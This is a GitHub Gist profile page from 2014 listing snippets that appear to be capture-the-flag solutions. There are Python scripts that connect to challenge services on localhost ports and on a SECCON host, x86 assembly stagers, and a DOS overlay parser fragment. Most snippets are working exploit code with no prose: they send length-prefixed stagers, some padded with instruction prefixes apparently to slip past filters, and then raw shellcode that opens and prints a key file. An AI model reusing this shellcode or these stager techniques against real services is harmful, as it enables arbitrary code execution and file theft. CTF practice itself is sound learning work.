Skip to content

Instantly share code, notes, and snippets.

View potetisensei's full-sized avatar

potetisensei

46 followers · 20 following
View GitHub Profile
@potetisensei
potetisensei / solve11.py
Created November 10, 2014 18:36
p.connect(("localhost", 10011))
stager = "\x68\x7f\x5a\xcd\x80\x68\x6a\x03\x58\x6a\x68\x89\xe1\x31\xdb\x54\xc3"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
p.send(stager)
p.send(read_shellcode)
print p.recv(1024)
@potetisensei
potetisensei / adhoc04.s
Created November 10, 2014 18:40
BITS 32
mov ecx, eax
xor ebx, ebx
push BYTE 0x03
pop eax
push BYTE 0x7f
pop edx
mov byte [ecx+18], 0xcd
mov byte [ecx+19], 0x80
@potetisensei
potetisensei / solve04.py
Created November 10, 2014 18:40
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10004))
stager = "\x89\xc1\x31\xdb\x6a\x03\x58\x6a\x7f\x5a\xc6\x41\x12\xcd\xc6\x41\x13\x80"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / solve07.py
Created November 10, 2014 18:48
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10007))
prefix = "\xf2\xf3"
stager = ""
stager += prefix + "\x89\xc1"
stager += prefix + "\x31\xdb"
@potetisensei
potetisensei / solve06.py
Created November 10, 2014 18:49
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10006))
prefix = "\xf2\xf3" * 3
stager = ""
stager += prefix + "\x89\xc1"
stager += prefix + "\x31\xdb"
@potetisensei
potetisensei / adhoc15.s
Created November 10, 2014 18:55
BITS 32
mov word [esp+0x14], 0xffff
mov [0x08049144], eax
push 0x08048C0A
ret
@potetisensei
potetisensei / solve15.py
Created November 10, 2014 18:56
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10015))
prefix = "\xf2\xf3"
stager = ""
stager += "\x66\xC7\x44\x24\x14\xFF\xFF"
stager += prefix + "\xA3\x44\x91\x04\x08"
@potetisensei
potetisensei / solve13.py
Last active August 29, 2015 14:09
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10013))
prefix = "\xf2\xf3"
stager = ""
stager += prefix * 2 + "\x90"
stager += "\x66\xC7\x44\x24\x14\xFF\xFF"
@potetisensei
potetisensei / rop_impossible.py
Created December 7, 2014 09:45
from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep
buf_clone = 0x080CB960
p = socket(AF_INET, SOCK_STREAM)
p.connect(("ropi.pwn.seccon.jp", 10000))
@potetisensei
potetisensei / dos_ovr.py
Created December 25, 2014 20:41
FB_MAGIC = 0x4246
OV_MAGIC = 0x564F
SI_COD = 0x0001
SI_OVR = 0x0002
SI_DAT = 0x0004
STUBUNK_SIZE = (0x20-0x10)
ovr_noexe = 0
ovr_pascal = 1
ovr_cpp = 2